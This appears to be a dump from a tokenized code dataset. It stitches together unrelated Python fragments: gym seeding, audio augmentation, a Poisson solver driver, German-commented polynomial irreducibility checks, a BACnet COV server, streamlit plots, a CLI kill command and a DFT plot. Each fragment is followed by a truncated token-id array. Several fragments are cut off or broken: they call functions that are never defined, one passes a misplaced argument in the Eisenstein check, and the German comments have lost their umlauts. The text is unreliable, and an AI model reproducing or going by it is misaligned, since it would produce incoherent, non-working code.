    elif isinstance(a, str):
        a = a.encode('utf8')
        a += hashlib.sha512(a).digest()
        a = _bigint_from_bytes(a[:max_bytes])
    elif isinstance(a, int):
        a = a % 2**(8 * max_bytes)
    else:
        # the upstream module raises its own gym-style error type here;
        # ValueError keeps this excerpt self-contained
        raise ValueError('Invalid type for seed: {} ({})'.format(type(a), a))

    return a

# TODO: don't hardcode sizeof_int here
[ 2, 464, 17168, 13789, 198, 2, 198, 2, 15269, 357, 66, 8, 12131, 42865, 3498, 379, 3936, 317, 5, 44, 2059, 198, 2, 15269, 357, 66, 8, 1584, 4946, 20185, 357, 5450, 1378, 9654, 1872, 13, 785, 8, 198, 2, 198, 2, 5990, 3411, 318, ...
3.016653
1,201
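# hash_seed and create_seed above rely on _bigint_from_bytes, which the
# excerpt elides. A sketch consistent with the `struct` import and the
# upstream Gym helper (recalled from memory, so treat as an approximation):
import os
import struct

def _bigint_from_bytes(bt):
    # interpret a byte string as a little-endian big integer, padding it
    # to a whole number of 4-byte unsigned ints first
    sizeof_int = 4
    padding = sizeof_int - len(bt) % sizeof_int
    bt += b'\0' * padding
    int_count = len(bt) // sizeof_int
    unpacked = struct.unpack("{}I".format(int_count), bt)
    accum = 0
    for i, val in enumerate(unpacked):
        accum += 2 ** (sizeof_int * 8 * i) * val
    return accum

print(_bigint_from_bytes(os.urandom(8)) < 2 ** 96)  # True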
import random import math from functools import partial import json import pysndfx import librosa import numpy as np import torch from ops.audio import ( read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout ) SAMPLE_RATE = 44100
[ 11748, 4738, 198, 11748, 10688, 198, 6738, 1257, 310, 10141, 1330, 13027, 198, 11748, 33918, 198, 198, 11748, 279, 893, 358, 21373, 198, 11748, 9195, 4951, 64, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 28034, 198, 198, 6738, 39628, ...
2.831683
101
#!/usr/env/bin python import os # os.environ['OMP_NUM_THREADS'] = '1' from newpoisson import poisson import numpy as np from fenics import set_log_level, File, RectangleMesh, Point mesh = RectangleMesh(Point(0,0), Point(1,1), 36, 36) # comm = mesh.mpi_comm() set_log_level(40) # ERROR=40 # from mpi4py import MPI # comm = MPI.COMM_WORLD # rank = comm.Get_rank() if __name__=='__main__': import argparse parser = argparse.ArgumentParser(description="Poisson Problem") parser.add_argument('-n', '--num', default = 10, type=int, help="Number of samples") parser.add_argument('-o', '--outfile', default='results', help="Output filename (no extension)") parser.add_argument('-i', '--input-dim', default=1, type=int) parser.add_argument('-d', '--dist', default='u', help='Distribution. `n` (normal), `u` (uniform, default)') args = parser.parse_args() num_samples = args.num dist = args.dist outfile = args.outfile.replace('.pkl','') inputdim = args.input_dim if inputdim == 1: # U[1,5] randsamples = 1 + 4*np.random.rand(num_samples) else: # N(0,1) if dist == 'n': randsamples = np.random.randn(num_samples, inputdim) elif dist == 'u': randsamples = -4*np.random.rand(num_samples, inputdim) else: raise ValueError("Improper distribution choice, use `n` (normal), `u` (uniform)") sample_seed_list = list(zip(range(num_samples), randsamples)) results = [] for sample in sample_seed_list: r = wrapper(sample, outfile) results.append(r) # print(results) import pickle pickle.dump(results, open(f'{outfile}.pkl','wb'))
[ 2, 48443, 14629, 14, 24330, 14, 8800, 21015, 198, 11748, 28686, 198, 2, 28686, 13, 268, 2268, 17816, 2662, 47, 62, 41359, 62, 4221, 15675, 50, 20520, 796, 705, 16, 6, 198, 6738, 649, 7501, 30927, 1330, 745, 30927, 198, 11748, 299, 3...
2.316354
746
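# The sampling loop above depends on `wrapper`, whose definition is elided
# from this row. A hypothetical stand-in matching only the call shape
# (seed/parameter pair in, serializable result out); the real version
# presumably solves the Poisson problem via `poisson` from newpoisson:
import numpy as np

def wrapper(sample, outfile):
    seed, params = sample
    np.random.seed(seed)  # hypothetical: seed the run for reproducibility
    return {"seed": int(seed), "params": np.atleast_1d(params).tolist()}

print(wrapper((0, 2.5), "results"))  # {'seed': 0, 'params': [2.5]}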
""" Irreduzibilittskriterien Implementiert wurden das Eisenstein- und das Perronkriterium Quellen: https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf bergeben werden Polynome vom Typ Polynomial, keine direkten Listen von Koeffizienten """ import logging import helper import itertools # rekursive Implementierung von HCF def hcf(x, y): """Highest common factor""" if y == 0: return x else: return hcf(y, x % y) def is_polynomial_coprime(polynomial): """berprft, ob ein Polynom teilerfremd (coprime) ist""" non_zero_polynomial = [ i for i in polynomial.coefficients if i != 0 ] # Nullen wrden Ergebnis von HCF verflschen if polynomial.degree() == 0: return True for x, y in itertools.combinations(non_zero_polynomial, 2): if hcf(x, y) != 1: return False return True # Quelle: https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf def is_irreducible_perron(polynomial): """ Prft ein Polynom auf Irreduzierbarkeit (Perron). Fhrender Koeffizient != 1 funktioniert nicht. Keine Aussage mglich, wenn vorletzer Koeffizient kleiner ist als die absolute Summe der restlichen Koeffizienten """ if polynomial.degree() < 0: return logging.error("Polynom ungltig") const_coefficient = polynomial.coefficients[0] if const_coefficient == 0: return 0 lead_coefficient = polynomial.coefficients[polynomial.degree()] assert lead_coefficient == 1 nm1_coefficient = abs(polynomial.coefficients[polynomial.degree() - 1]) total = 1 i = 0 for coeff in polynomial.coefficients: if i < polynomial.degree() - 1: total += abs(coeff) i = i + 1 if nm1_coefficient > total: return 1 return 2 # Quellen: https://www.uni-frankfurt.de/81429607/Stix_Algebra_SkriptWS2016_17.pdf # http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf def is_irreducible_eisenstein(polynomial): """ Eine Implementierung des Eisensteinkriteriums. """ # Polynom muss einen Grad m >= 1 haben if polynomial.degree() < 1: return 2 # Voraussetzung fr Eisenstein sind teilerfremde Koeffizienten if helper.is_polynomial_coprime(polynomial is False): return 2 # Prfe, ob es eine Primzahl gibt, die alle Koeffizienten des Polynoms bis Grad m - 1 teilt. p^2 darf a0 nicht teilen const_coeff = polynomial.coefficients[0] if const_coeff == 0: return 0 # Erhalte Primfaktorzerlegung der Konstante, um Grundlage von Primzahlen zu erhalten prime_factors = helper.prime_factor(const_coeff) for p in prime_factors: if ( const_coeff % pow(p, 2) != 0 ): # teilt p^2 den konstanten Koeffizienten, dann kann keine Aussage getroffen werden return 2 for coeff in polynomial.coefficients[0 : polynomial.degree() - 1]: if coeff % p != 0: return 2 # teilt die Primzahl den Koeffizienten nicht, kann keine Aussage getroffen werden return 1
[ 37811, 198, 220, 220, 220, 5686, 445, 10277, 571, 346, 715, 8135, 43407, 2013, 198, 220, 220, 220, 48282, 72, 861, 266, 42568, 288, 292, 22633, 5714, 12, 3318, 288, 292, 2448, 1313, 74, 43407, 1505, 198, 220, 220, 220, 4670, 297, 26...
2.277536
1,380
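# For a concrete check independent of the helper/Polynomial machinery above,
# a self-contained Eisenstein test on a plain coefficient list (coeffs[i] is
# the coefficient of x**i): x**3 + 2x + 2 is irreducible via p = 2.
def prime_factors(n):
    n, p, out = abs(n), 2, []
    while p * p <= n:
        if n % p:
            p += 1
        else:
            out.append(p)
            while n % p == 0:
                n //= p
    if n > 1:
        out.append(n)
    return out

def eisenstein_irreducible(coeffs):
    *lower, lead = coeffs
    for p in prime_factors(lower[0]):
        # p must not divide the leading coefficient, must divide all lower
        # coefficients, and p**2 must not divide the constant term
        if lead % p and all(c % p == 0 for c in lower) and lower[0] % (p * p):
            return True
    return False  # no conclusion from Eisenstein

print(eisenstein_irreducible([2, 2, 0, 1]))  # True: p = 2 works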
# # Copyright (c) 2017 Intel Corporation # SPDX-License-Identifier: BSD-2-Clause # import copy import numpy as np from llvmlite import ir as lir from numba.core import types, typing, utils, ir, config, ir_utils, registry from numba.core.typing.templates import (CallableTemplate, signature, infer_global, AbstractTemplate) from numba.core.imputils import lower_builtin from numba.core.extending import register_jitable from numba.core.errors import NumbaValueError from numba.misc.special import literal_unroll import numba import operator from numba.np import numpy_support def slice_addition(the_slice, addend): """ Called by stencil in Python mode to add the loop index to a user-specified slice. """ return slice(the_slice.start + addend, the_slice.stop + addend)
[ 2, 198, 2, 15069, 357, 66, 8, 2177, 8180, 10501, 198, 2, 30628, 55, 12, 34156, 12, 33234, 7483, 25, 347, 10305, 12, 17, 12, 2601, 682, 198, 2, 198, 198, 11748, 4866, 198, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 32660, 85, ...
2.817568
296
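# A quick demonstration of slice_addition above: in stencil lowering it
# shifts a relative slice by the current loop index, e.g. index 5.
def slice_addition(the_slice, addend):
    return slice(the_slice.start + addend, the_slice.stop + addend)

print(slice_addition(slice(-1, 2), 5))  # slice(4, 7)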
import numpy as np import pydrake.symbolic as ps import torch import time from irs_lqr.dynamical_system import DynamicalSystem
[ 11748, 299, 32152, 355, 45941, 198, 11748, 279, 5173, 33788, 13, 1837, 2022, 4160, 355, 26692, 198, 11748, 28034, 198, 11748, 640, 198, 198, 6738, 4173, 82, 62, 75, 80, 81, 13, 67, 4989, 605, 62, 10057, 1330, 14970, 605, 11964, 198 ]
3.047619
42
import streamlit as st import math from scipy.stats import * import pandas as pd import numpy as np from plotnine import *
[ 11748, 4269, 18250, 355, 336, 198, 11748, 10688, 198, 6738, 629, 541, 88, 13, 34242, 1330, 1635, 198, 11748, 19798, 292, 355, 279, 67, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 7110, 30888, 1330, 1635, 198 ]
3.324324
37
import logging import unittest from config_test import build_client_from_configuration _logger = logging.getLogger(__name__)
[ 11748, 18931, 198, 11748, 555, 715, 395, 198, 198, 6738, 4566, 62, 9288, 1330, 1382, 62, 16366, 62, 6738, 62, 11250, 3924, 198, 198, 62, 6404, 1362, 796, 18931, 13, 1136, 11187, 1362, 7, 834, 3672, 834, 8, 628 ]
3.282051
39
"""Runway providers."""
[ 37811, 10987, 1014, 9549, 526, 15931, 198 ]
3.428571
7
#!/usr/bin/env python """ This sample application is a server that supports COV notification services. The console accepts commands that change the properties of an object that triggers the notifications. """ import time from threading import Thread from bacpypes.debugging import bacpypes_debugging, ModuleLogger from bacpypes.consolelogging import ConfigArgumentParser from bacpypes.consolecmd import ConsoleCmd from bacpypes.core import run, deferred, enable_sleeping from bacpypes.task import RecurringTask from bacpypes.app import BIPSimpleApplication from bacpypes.object import AnalogValueObject, BinaryValueObject from bacpypes.local.device import LocalDeviceObject from bacpypes.service.cov import ChangeOfValueServices # some debugging _debug = 0 _log = ModuleLogger(globals()) # test globals test_av = None test_bv = None test_application = None # # SubscribeCOVApplication # # # COVConsoleCmd # def main(): global test_av, test_bv, test_application # make a parser parser = ConfigArgumentParser(description=__doc__) parser.add_argument("--console", action="store_true", default=False, help="create a console", ) # analog value task and thread parser.add_argument("--avtask", type=float, help="analog value recurring task", ) parser.add_argument("--avthread", type=float, help="analog value thread", ) # analog value task and thread parser.add_argument("--bvtask", type=float, help="binary value recurring task", ) parser.add_argument("--bvthread", type=float, help="binary value thread", ) # provide a different spin value parser.add_argument("--spin", type=float, help="spin time", default=1.0, ) # parse the command line arguments args = parser.parse_args() if _debug: _log.debug("initialization") if _debug: _log.debug(" - args: %r", args) # make a device object this_device = LocalDeviceObject(ini=args.ini) if _debug: _log.debug(" - this_device: %r", this_device) # make a sample application test_application = SubscribeCOVApplication(this_device, args.ini.address) # make an analog value object test_av = AnalogValueObject( objectIdentifier=('analogValue', 1), objectName='av', presentValue=0.0, statusFlags=[0, 0, 0, 0], covIncrement=1.0, ) _log.debug(" - test_av: %r", test_av) # add it to the device test_application.add_object(test_av) _log.debug(" - object list: %r", this_device.objectList) # make a binary value object test_bv = BinaryValueObject( objectIdentifier=('binaryValue', 1), objectName='bv', presentValue='inactive', statusFlags=[0, 0, 0, 0], ) _log.debug(" - test_bv: %r", test_bv) # add it to the device test_application.add_object(test_bv) # make a console if args.console: test_console = COVConsoleCmd() _log.debug(" - test_console: %r", test_console) # enable sleeping will help with threads enable_sleeping() # analog value task if args.avtask: test_av_task = TestAnalogValueTask(args.avtask) test_av_task.install_task() # analog value thread if args.avthread: test_av_thread = TestAnalogValueThread(args.avthread) deferred(test_av_thread.start) # binary value task if args.bvtask: test_bv_task = TestBinaryValueTask(args.bvtask) test_bv_task.install_task() # binary value thread if args.bvthread: test_bv_thread = TestBinaryValueThread(args.bvthread) deferred(test_bv_thread.start) _log.debug("running") run(args.spin) _log.debug("fini") if __name__ == "__main__": main()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 37811, 198, 1212, 6291, 3586, 318, 257, 4382, 326, 6971, 7375, 53, 14483, 2594, 13, 198, 464, 8624, 18178, 9729, 326, 1487, 262, 6608, 286, 281, 2134, 326, 198, 2213, 328, 5355, ...
2.547493
1,516
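# main() above instantiates SubscribeCOVApplication, whose body is elided
# from this row. In the upstream bacpypes COV sample the application class is
# just the two services mixed together; a sketch on that assumption:
from bacpypes.debugging import bacpypes_debugging
from bacpypes.app import BIPSimpleApplication
from bacpypes.service.cov import ChangeOfValueServices

@bacpypes_debugging
class SubscribeCOVApplication(BIPSimpleApplication, ChangeOfValueServices):
    pass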
import os import platform import subprocess from django.http import HttpResponse from django.conf import settings
[ 11748, 28686, 198, 11748, 3859, 198, 11748, 850, 14681, 198, 198, 6738, 42625, 14208, 13, 4023, 1330, 367, 29281, 31077, 198, 6738, 42625, 14208, 13, 10414, 1330, 6460, 198 ]
3.965517
29
import random import numpy as np import pandas as pd import streamlit as st from sklearn.naive_bayes import GaussianNB from sklearn.model_selection import train_test_split from yellowbrick.classifier import classification_report from yellowbrick.target import FeatureCorrelation from yellowbrick.target import ClassBalance from streamlit_yellowbrick import st_yellowbrick from typing import Any, List, Tuple import plotly.express as px def data_prep(df: pd.DataFrame) -> Tuple[List, List, List, List]: """ Purpose: Prep data for modeling Args: df - Pandas dataframe Returns: test_features - test set features train_features - train set feautres test_target - test set target train_target - train set target """ # Specify the target classes target_string = st.selectbox("Select Target Column", df.columns) target = np.array(df[target_string]) # Select Features you want feature_cols = st.multiselect("Select Modeling Features", df.columns) # Get all features features = df[feature_cols] featurestmp = np.array(features) feats = [] # find all bad rows for index, featarr in enumerate(featurestmp): try: featarr = featarr.astype(float) feats.append(featarr) except Exception as error: st.error(error) st.error(featarr) st.stop() featuresarr = np.array(feats) # Split Data randInt = random.randint(1, 200) ( test_features, train_features, test_target, train_target, ) = train_test_split(featuresarr, target, test_size=0.75, random_state=randInt) return ( test_features, train_features, test_target, train_target, ) def show_classification_report( df: pd.DataFrame, ) -> None: """ Purpose: Renders a classification_report Args: df - Pandas dataframe Returns: N/A """ # Prep data for model training ( test_features, train_features, test_target, train_target, ) = data_prep(df) if st.button("Train Model"): st.header("Classification Report") st.markdown( "The classification report visualizer displays the precision, recall, F1, and support scores for the model. In order to support easier interpretation and problem detection, the report integrates numerical scores with a color-coded heatmap. All heatmaps are in the range (0.0, 1.0) to facilitate easy comparison of classification models across different classification reports." 
) # Instantiate the visualizer visualizer = classification_report( GaussianNB(), train_features, train_target, test_features, test_target, support=True, ) # Get the viz fig = visualizer.fig ax = visualizer.show() fig.axes.append(ax) # show the viz st.write(fig) # TODO download model, Download report # TODO live predictions def feature_correlation(df: pd.DataFrame) -> None: """ Purpose: Renders a feature correlation graph Args: df - Pandas dataframe Returns: N/A """ target_string = st.selectbox("Select Target Column", df.columns, key="selectbox-feature-correlation") residual_cols = [col for col in df.columns if col != target_string and df[col].dtype != "object"] feature_cols = st.multiselect("Select Modeling Features", residual_cols, key="multiselect-feature-correlation", default=residual_cols[:5]) if str(df[target_string].dtype) == "object": method = 'mutual_info-classification' else: type_problem = st.selectbox("Select the type of problem", ['classification', 'regression']) if type_problem == 'classification': method = st.selectbox("Select the correlation method", ['mutual_info-classification', 'pearson']) else: method = st.selectbox("Select the correlation method", ['mutual_info-regression', 'pearson']) try: viz = FeatureCorrelation(method=method, feature_names=feature_cols, sort=True) viz.fit(df[feature_cols], df[target_string]) fig = px.bar(x=viz.scores_, y=viz.features_, title="Feature Correlation") st.plotly_chart(fig) except : st.warning("Verify the type of problem that you select") def class_balance(df: pd.DataFrame) -> None: """ Purpose: Renders a class balance graph Args: df - Pandas dataframe Returns: N/A """ classes = st.selectbox("Select Class Column", df.columns, index = len(df.columns) - 1) visualizer = ClassBalance(labels = df[classes].unique()) visualizer.fit(df[classes]) st_yellowbrick(visualizer)
[ 11748, 4738, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 19798, 292, 355, 279, 67, 198, 11748, 4269, 18250, 355, 336, 198, 6738, 1341, 35720, 13, 2616, 425, 62, 24406, 274, 1330, 12822, 31562, 32819, 198, 6738, 1341, 35720, 13, 1984...
2.310468
2,245
from flask import request
import random
import re
from flask import current_app, jsonify
from flask import g
from flask import make_response
from flask import redirect
from flask import render_template
from flask import session
from flask import url_for
import time
from info import constants, db
from info import redis_store
from info.lib.yuntongxun.sms import CCP
from info.utils.captcha.captcha import captcha
from info.utils.image_storage import storage
from info.utils.response_code import RET
from info.modules.passport import passport_blu
from info.models import User, Category, News
from info.modules.profile import profile_blu
from info.utils.common import user_login_data
from datetime import datetime, timedelta

from . import admin_blu
[ 6738, 42903, 1330, 2581, 198, 11748, 4738, 198, 11748, 302, 198, 6738, 42903, 1330, 1459, 62, 1324, 11, 33918, 1958, 198, 6738, 42903, 1330, 308, 198, 6738, 42903, 1330, 787, 62, 26209, 198, 6738, 42903, 1330, 18941, 198, 6738, 42903, 1...
3.834146
205
#Answer Generation
import csv
import os

import numpy as np
from keras.models import *
from keras.models import Model
from keras.preprocessing import text

train_ans, anslist = [], []


def main():
    # Hypothetical placeholder: the original sample elides main()'s body,
    # which presumably loads the answers into train_ans/anslist and runs
    # the Keras model.
    pass


if __name__ == "__main__":
    main()
[ 2, 33706, 16588, 198, 11748, 269, 21370, 198, 11748, 28686, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 41927, 292, 13, 27530, 1330, 1635, 198, 6738, 41927, 292, 13, 27530, 1330, 9104, 198, 6738, 41927, 292, 13, 3866, 36948, 1330, 24...
3.126761
71
# -*- coding: UTF-8 -*-
from socket import *

# Hypothetical stand-ins: the original sample elides both the server address
# and the client() body, so this is a minimal sketch consistent with the
# commented-out request below, not the verbatim original.
address = '127.0.0.1'


def client():
    sock = socket(AF_INET, SOCK_STREAM)
    sock.connect((address, 80))
    sock.send(':)'.encode())
    sock.close()


if __name__=='__main__':
    client()

    # buffer='POST /post HTTP/1.1\r\n'
    # buffer+='Content-Type:application/json\r\n'
    # buffer+='Body:{\\"StuId\\":\\"410785016 Chao,He-Teng\\"}\r\n'
    # buffer+='Address : ' + address + '\r\n'
    # buffer+='\r\n'
    # print(buffer)
    # message = ":)"
[ 2, 532, 9, 12, 19617, 25, 41002, 12, 23, 532, 9, 12, 198, 6738, 17802, 1330, 1635, 198, 198, 361, 11593, 3672, 834, 855, 6, 834, 12417, 834, 10354, 198, 220, 220, 220, 5456, 3419, 628, 1303, 11876, 11639, 32782, 1220, 7353, 14626, ...
2.297872
141
"""Non-linear SPDE model on a periodic 1D spatial domain for laminar wave fronts. Based on the Kuramato--Sivashinsky PDE model [1, 2] which exhibits spatio-temporally chaotic dynamics. References: 1. Kuramoto and Tsuzuki. Persistent propagation of concentration waves in dissipative media far from thermal equilibrium. Progress in Theoretical Physcs, 55 (1976) pp. 356369. 2. Sivashinsky. Nonlinear analysis of hydrodynamic instability in laminar flames I. Derivation of basic equations. Acta Astronomica, 4 (1977) pp. 11771206. """ from typing import Union, Optional, Sequence, Callable import numpy as np from dapy.models.base import AbstractDiagonalGaussianModel from dapy.models.spatial import SpatiallyExtendedModelMixIn from dapy.integrators.etdrk4 import FourierETDRK4Integrator from dapy.models.transforms import ( OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array, )
[ 37811, 15419, 12, 29127, 30628, 36, 2746, 319, 257, 27458, 352, 35, 21739, 7386, 329, 300, 5669, 283, 6769, 29324, 13, 198, 198, 15001, 319, 262, 18132, 321, 5549, 438, 50, 452, 1077, 19870, 350, 7206, 2746, 685, 16, 11, 362, 60, 54...
3.012048
332
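# The ETDRK4 integrator imported above treats the PDE's linear part exactly;
# for Kuramoto--Sivashinsky, u_t = -u*u_x - u_xx - u_xxxx, that part is
# diagonal in Fourier space. A minimal numpy sketch of the symbol (standard
# KS algebra, not code from dapy):
import numpy as np

def ks_linear_symbol(num_mesh_points, domain_extent):
    # angular wavenumbers of a periodic domain of length domain_extent
    k = 2 * np.pi * np.fft.rfftfreq(num_mesh_points,
                                    d=domain_extent / num_mesh_points)
    # -d^2/dx^2 - d^4/dx^4 acts on mode k as k**2 - k**4
    return k**2 - k**4

print(ks_linear_symbol(64, 32.0)[:4])  # low modes (|k| < 1) are unstable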
"""Utiltiy functions for working with Myo Armband data.""" from setuptools import setup, find_packages setup(name='myo_helper', version='0.1', description='Utiltiy functions for working with Myo Armband data', author='Lif3line', author_email='adamhartwell2@gmail.com', license='MIT', packages=find_packages(), url='https://github.com/Lif3line/myo_helper', # use the URL to the github repo install_requires=[ 'scipy', 'sklearn', 'numpy' ], keywords='myo emg')
[ 37811, 18274, 2326, 7745, 5499, 329, 1762, 351, 2011, 78, 943, 2022, 392, 1366, 526, 15931, 198, 198, 6738, 900, 37623, 10141, 1330, 9058, 11, 1064, 62, 43789, 628, 198, 40406, 7, 3672, 11639, 1820, 78, 62, 2978, 525, 3256, 198, 220, ...
2.333333
237
# -*-encoding:utf-8-*- import os from karlooper.web.application import Application from karlooper.web.request import Request url_mapping = { "/users": UsersHandler, "/user-info": UserInfoHandler } settings = { "template": os.getcwd() + "/templates", "static": os.getcwd() + "/templates", "log_enable": False, "debug": True } if __name__ == '__main__': application = Application(url_mapping, settings=settings) application.listen(port=8080) application.run()
[ 2, 532, 9, 12, 12685, 7656, 25, 40477, 12, 23, 12, 9, 12, 198, 198, 11748, 28686, 198, 6738, 479, 283, 5439, 3575, 13, 12384, 13, 31438, 1330, 15678, 198, 6738, 479, 283, 5439, 3575, 13, 12384, 13, 25927, 1330, 19390, 628, 628, 19...
2.670213
188
import random import math
[ 11748, 4738, 198, 11748, 10688, 628, 628, 198 ]
3.75
8
from waiter.action import process_kill_request from waiter.util import guard_no_cluster, check_positive def kill(clusters, args, _, __): """Kills the service(s) using the given token name.""" guard_no_cluster(clusters) token_name_or_service_id = args.get('token-or-service-id') is_service_id = args.get('is-service-id', False) force_flag = args.get('force', False) timeout_secs = args['timeout'] success = process_kill_request(clusters, token_name_or_service_id, is_service_id, force_flag, timeout_secs) return 0 if success else 1 def register(add_parser): """Adds this sub-command's parser and returns the action function""" parser = add_parser('kill', help='kill services') parser.add_argument('token-or-service-id') parser.add_argument('--force', '-f', help='kill all services, never prompt', dest='force', action='store_true') parser.add_argument('--service-id', '-s', help='kill by service id instead of token', dest='is-service-id', action='store_true') parser.add_argument('--timeout', '-t', help='timeout (in seconds) for kill to complete', type=check_positive, default=30) return kill
[ 6738, 46612, 13, 2673, 1330, 1429, 62, 12728, 62, 25927, 198, 6738, 46612, 13, 22602, 1330, 4860, 62, 3919, 62, 565, 5819, 11, 2198, 62, 24561, 628, 198, 4299, 1494, 7, 565, 13654, 11, 26498, 11, 4808, 11, 11593, 2599, 198, 220, 220...
2.772414
435
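# A minimal wiring sketch for register() above: hypothetical driver code,
# assumed to run in the same module so check_positive is in scope. It only
# exercises the argument parsing, not an actual kill against a cluster.
import argparse

root = argparse.ArgumentParser(prog="waiter")
subparsers = root.add_subparsers()
action = register(lambda name, **kwargs: subparsers.add_parser(name, **kwargs))
args = vars(root.parse_args(["kill", "my-token", "--timeout", "60"]))
print(args["timeout"], args["is-service-id"])  # 60 False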
"""The main module of the Analytics API Load Tests tool. Copyright (c) 2019 Red Hat Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. """ import sys import os from time import time from fastlog import log from csv_reader import read_csv_as_dicts from setup import setup from cliargs import cli_parser from component_analysis import ComponentAnalysis from stack_analysis import StackAnalysis from test_runner import start_tests # current version of this tool VERSION_MAJOR = 1 VERSION_MINOR = 0 def check_api_endpoint(api): """Check that some API endpoint is callable.""" log.info("Checking: core API endpoint") with log.indent(): if not api.is_api_running(): log.error("Fatal: tested system is not available") sys.exit(1) else: log.success("ok") def check_auth_token(api): """Check the authorization token for the core API.""" log.info("Checking: authorization token for the core API") with log.indent(): if api.check_auth_token_validity(): log.success("ok") else: log.error("Fatal: wrong token(?)") sys.exit(1) def check_system(api): """Check if all system endpoints are available and that tokens are valid.""" # try to access system endpoints log.info("System check") with log.indent(): check_api_endpoint(api) check_auth_token(api) def show_version(): """Show A2T version.""" print("A2T version {major}.{minor}".format(major=VERSION_MAJOR, minor=VERSION_MINOR)) def main(): """Entry point to the Analytics API Load Tests.""" log.setLevel(log.INFO) cli_arguments = cli_parser.parse_args() if cli_arguments.version: show_version() sys.exit(0) else: cfg = setup(cli_arguments) coreapi_url = os.environ.get('F8A_SERVER_API_URL', None) component_analysis = ComponentAnalysis(coreapi_url, cfg["access_token"], cfg["user_key"], True) stack_analysis = StackAnalysis(coreapi_url, cfg["access_token"], cfg["user_key"], True) check_system(component_analysis) try: tests = read_csv_as_dicts(cfg["input_file"]) except Exception as e: log.error("Test description can not be read") log.error(e) sys.exit(0) t1 = time() tags = cfg["tags"] start_tests(cfg, tests, tags, component_analysis, stack_analysis) t2 = time() log.info("Start time: {}".format(t1)) log.info("End time: {}".format(t2)) log.info("Duration: {}".format(t2 - t1)) if __name__ == "__main__": # execute only if run as a script main()
[ 37811, 464, 1388, 8265, 286, 262, 30437, 7824, 8778, 30307, 2891, 13, 198, 198, 15269, 357, 66, 8, 13130, 2297, 10983, 3457, 13, 198, 198, 1212, 1430, 318, 1479, 3788, 25, 345, 460, 17678, 4163, 340, 290, 14, 273, 13096, 198, 270, 7...
2.548092
1,310
# See LICENSE.incore file for details import os,re import multiprocessing as mp import time import shutil from riscv_ctg.log import logger import riscv_ctg.utils as utils import riscv_ctg.constants as const from riscv_isac.cgf_normalize import expand_cgf from riscv_ctg.generator import Generator from math import * from riscv_ctg.__init__ import __version__
[ 2, 4091, 38559, 24290, 13, 1939, 382, 2393, 329, 3307, 198, 198, 11748, 28686, 11, 260, 198, 11748, 18540, 305, 919, 278, 355, 29034, 198, 198, 11748, 640, 198, 11748, 4423, 346, 198, 6738, 374, 2304, 85, 62, 310, 70, 13, 6404, 1330...
2.873016
126
from collections import namedtuple MainTimer = namedtuple('MainTimer', 'new_time_joined, end_period, new_weekday, days') print('---'*30) x = add_time('10:00 AM', '54:00', 'Monday') print(x) print('---'*30)
[ 6738, 17268, 1330, 3706, 83, 29291, 628, 198, 13383, 48801, 796, 3706, 83, 29291, 10786, 13383, 48801, 3256, 705, 3605, 62, 2435, 62, 46416, 11, 886, 62, 41007, 11, 649, 62, 10464, 820, 11, 1528, 11537, 628, 198, 198, 4798, 10786, 632...
2.658228
79
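# The row above calls add_time, which the sample never defines. A
# self-contained sketch matching what the call implies (an assumed
# implementation of the usual time-calculator exercise, not the original):
def add_time(start, duration, weekday=None):
    # '10:00 AM' + '54:00' from Monday -> '4:00 PM, Wednesday (2 days later)'
    days = ['Monday', 'Tuesday', 'Wednesday', 'Thursday',
            'Friday', 'Saturday', 'Sunday']
    time_part, period = start.split()
    hour, minute = (int(x) for x in time_part.split(':'))
    hour = hour % 12 + (12 if period == 'PM' else 0)
    dur_h, dur_m = (int(x) for x in duration.split(':'))
    days_later, rem = divmod(hour * 60 + minute + dur_h * 60 + dur_m, 24 * 60)
    hour, minute = divmod(rem, 60)
    new_time = '{}:{:02d} {}'.format(hour % 12 or 12, minute,
                                     'AM' if hour < 12 else 'PM')
    if weekday:
        new_time += ', ' + days[(days.index(weekday.capitalize()) + days_later) % 7]
    if days_later == 1:
        new_time += ' (next day)'
    elif days_later > 1:
        new_time += ' ({} days later)'.format(days_later)
    return new_time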
from .analyze_logs import AnalyzeLogs from .search_interface import SearchInterface from .detail_interface import DetailInterface from .user_interface import UserInterface from .visualize_log_detail import VisualizeLogDetail
[ 6738, 764, 38200, 2736, 62, 6404, 82, 1330, 16213, 2736, 11187, 82, 198, 6738, 764, 12947, 62, 39994, 1330, 11140, 39317, 198, 6738, 764, 49170, 62, 39994, 1330, 42585, 39317, 198, 6738, 764, 7220, 62, 39994, 1330, 11787, 39317, 198, 67...
4.090909
55
import matplotlib.pyplot as plt import numpy as np import sys sys.path.append('../../../software/models/') import dftModel as DFT import math k0 = 8.5 N = 64 w = np.ones(N) x = np.cos(2*np.pi*k0/N*np.arange(-N/2,N/2)) mX, pX = DFT.dftAnal(x, w, N) y = DFT.dftSynth(mX, pX, N) plt.figure(1, figsize=(9.5, 5)) plt.subplot(311) plt.title('positive freq. magnitude spectrum in dB: mX') plt.plot(np.arange(mX.size), mX, 'r', lw=1.5) plt.axis([0,mX.size, min(mX), max(mX)+1]) plt.subplot(312) plt.title('positive freq. phase spectrum: pX') plt.plot(np.arange(pX.size), pX, 'c', lw=1.5) plt.axis([0, pX.size,-np.pi,np.pi]) plt.subplot(313) plt.title('inverse spectrum: IDFT(X)') plt.plot(np.arange(-N/2, N/2), y,'b', lw=1.5) plt.axis([-N/2,N/2-1,min(y), max(y)]) plt.tight_layout() plt.savefig('idft.png') plt.show()
